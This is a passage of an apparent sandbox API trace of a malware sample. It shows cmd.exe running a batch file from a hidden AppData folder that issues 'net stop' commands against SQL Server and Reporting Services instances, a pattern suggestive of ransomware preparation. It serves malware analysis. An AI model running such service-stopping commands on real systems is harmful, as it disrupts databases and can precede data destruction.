lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.719] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.720] GetLastError () returned 0x2 [0196.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.720] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.721] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.721] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0196.722] SetErrorMode (uMode=0x0) returned 0x1 [0196.722] GetProcessHeap () returned 0x3e0000 [0196.722] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0196.722] GetProcessHeap () returned 0x3e0000 [0196.722] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0196.722] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.722] GetProcessHeap () returned 0x3e0000 [0196.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0196.722] GetProcessHeap () returned 0x3e0000 [0196.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0196.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.723] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.723] GetLastError () returned 0x2 [0196.723] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.723] GetLastError () returned 0x2 [0196.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.724] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.725] GetLastError () returned 0x2 [0196.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.725] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.725] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.726] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0196.726] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0196.726] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0196.726] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.726] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ReportServer$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ReportServer$TPS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ReportServer$TPS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x91c, dwThreadId=0x920)) returned 1 [0196.730] CloseHandle (hObject=0x78) returned 1 [0196.730] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.730] GetProcessHeap () returned 0x3e0000 [0196.730] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.730] GetEnvironmentStringsW () returned 0x3f8408* [0196.730] GetProcessHeap () returned 0x3e0000 [0196.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.730] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.730] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0196.851] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0196.851] CloseHandle (hObject=0x74) returned 1 [0196.851] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0196.851] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0196.851] GetProcessHeap () returned 0x3e0000 [0196.851] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.852] GetEnvironmentStringsW () returned 0x3f8408* [0196.852] GetProcessHeap () returned 0x3e0000 [0196.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.852] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0196.852] GetProcessHeap () returned 0x3e0000 [0196.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.852] GetEnvironmentStringsW () returned 0x3f8408* [0196.852] GetProcessHeap () returned 0x3e0000 [0196.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.852] GetProcessHeap () returned 0x3e0000 [0196.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0196.852] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0196.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.852] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0196.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.852] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0196.852] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.852] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0196.852] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.853] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0196.853] SetConsoleInputExeNameW () returned 0x1 [0196.853] GetConsoleOutputCP () returned 0x1b5 [0196.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0196.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0196.853] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0196.853] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.853] SetFilePointer (in: hFile=0x74, lDistanceToMove=2459, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x99b [0196.853] GetProcessHeap () returned 0x3e0000 [0196.853] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0196.853] GetProcessHeap () returned 0x3e0000 [0196.853] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0196.853] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0196.854] GetProcessHeap () returned 0x3e0000 [0196.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0196.854] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.854] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99b [0196.854] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf26, lpOverlapped=0x0) returned 1 [0196.854] SetFilePointer (in: hFile=0x74, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0196.854] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$ECWDB2 /y\r\n/y\r\n\nITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0196.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.855] GetFileType (hFile=0x74) returned 0x1 [0196.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.855] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0196.855] GetProcessHeap () returned 0x3e0000 [0196.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0196.855] GetProcessHeap () returned 0x3e0000 [0196.855] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0196.858] _tell (_FileHandle=3) returned 2485 [0196.858] _close (_FileHandle=3) returned 0 [0196.858] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0196.858] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0196.858] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0196.858] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0196.858] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0196.858] _wcsicmp (_String1="net", _String2="CD") returned 11 [0196.858] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0196.858] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0196.858] _wcsicmp (_String1="net", _String2="REN") returned -4 [0196.858] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0196.858] _wcsicmp (_String1="net", _String2="SET") returned -5 [0196.858] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0196.858] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0196.859] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0196.859] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0196.859] _wcsicmp (_String1="net", _String2="MD") returned 1 [0196.859] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0196.859] _wcsicmp (_String1="net", _String2="RD") returned -4 [0196.859] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0196.859] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0196.859] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0196.859] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0196.859] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0196.859] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0196.859] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0196.859] _wcsicmp (_String1="net", _String2="VER") returned -8 [0196.859] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0196.859] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0196.859] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0196.859] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0196.859] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0196.859] _wcsicmp (_String1="net", _String2="START") returned -5 [0196.859] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0196.859] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0196.859] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0196.859] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0196.859] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0196.859] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0196.859] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0196.859] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0196.859] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0196.859] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0196.860] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0196.860] SetErrorMode (uMode=0x0) returned 0x1 [0196.860] GetProcessHeap () returned 0x3e0000 [0196.860] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0196.860] GetProcessHeap () returned 0x3e0000 [0196.860] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0196.861] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.861] GetProcessHeap () returned 0x3e0000 [0196.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0196.861] GetProcessHeap () returned 0x3e0000 [0196.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0196.861] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.861] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.862] GetLastError () returned 0x2 [0196.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.862] GetLastError () returned 0x2 [0196.862] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.863] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.863] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.863] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.863] GetLastError () returned 0x2 [0196.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.864] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.864] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.865] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0196.865] SetErrorMode (uMode=0x0) returned 0x1 [0196.865] GetProcessHeap () returned 0x3e0000 [0196.865] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0196.865] GetProcessHeap () returned 0x3e0000 [0196.865] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0196.865] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.865] GetProcessHeap () returned 0x3e0000 [0196.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0196.866] GetProcessHeap () returned 0x3e0000 [0196.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0196.866] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.866] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.866] GetLastError () returned 0x2 [0196.867] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.867] GetLastError () returned 0x2 [0196.867] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.868] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.868] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.868] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.868] GetLastError () returned 0x2 [0196.868] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.869] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.869] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.869] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0196.869] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0196.869] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0196.869] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.870] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$ECWDB2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$ECWDB2 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x95c, dwThreadId=0x9ec)) returned 1 [0196.873] CloseHandle (hObject=0x74) returned 1 [0196.873] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.873] GetProcessHeap () returned 0x3e0000 [0196.873] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.873] GetEnvironmentStringsW () returned 0x3f8408* [0196.873] GetProcessHeap () returned 0x3e0000 [0196.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.873] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.873] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0197.048] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.048] CloseHandle (hObject=0x78) returned 1 [0197.048] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.048] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.048] GetProcessHeap () returned 0x3e0000 [0197.048] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.049] GetEnvironmentStringsW () returned 0x3f8408* [0197.049] GetProcessHeap () returned 0x3e0000 [0197.049] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.049] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.049] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.049] GetProcessHeap () returned 0x3e0000 [0197.049] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.049] GetEnvironmentStringsW () returned 0x3f8408* [0197.049] GetProcessHeap () returned 0x3e0000 [0197.049] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.049] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.049] GetProcessHeap () returned 0x3e0000 [0197.049] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.049] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.049] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.049] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.049] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.049] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.049] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.049] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.050] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.050] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.050] SetConsoleInputExeNameW () returned 0x1 [0197.050] GetConsoleOutputCP () returned 0x1b5 [0197.050] GetCPInfo (in: CodePage=0x1b5, 